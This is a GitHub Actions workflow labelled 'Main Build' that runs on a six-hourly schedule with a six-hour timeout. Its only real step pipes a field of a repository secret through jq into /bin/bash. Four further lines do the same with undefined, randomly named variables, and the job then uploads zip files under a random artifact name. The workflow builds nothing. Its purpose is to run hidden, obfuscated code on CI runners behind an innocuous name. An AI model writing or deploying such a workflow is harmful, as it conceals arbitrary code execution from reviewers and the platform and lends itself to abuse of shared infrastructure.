name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '14 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          uaf395: ${{ secrets.uaf395 }}
        run: |
          printf '%s' "$uaf395" | jq -r .cjolz95 | /bin/bash
          printf '%s' "$nvql7514" | jq -r .kjy77 | /bin/bash
          printf '%s' "$gfb9516" | jq -r .qe57402 | /bin/bash
          echo $b83768 | jq -r .bozqo0 | /bin/bash
          printf '%s' "$pvbf3395" | jq -r .te4309 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: LK9PKSbP
          path: "*.zip"
          retention-days: 1
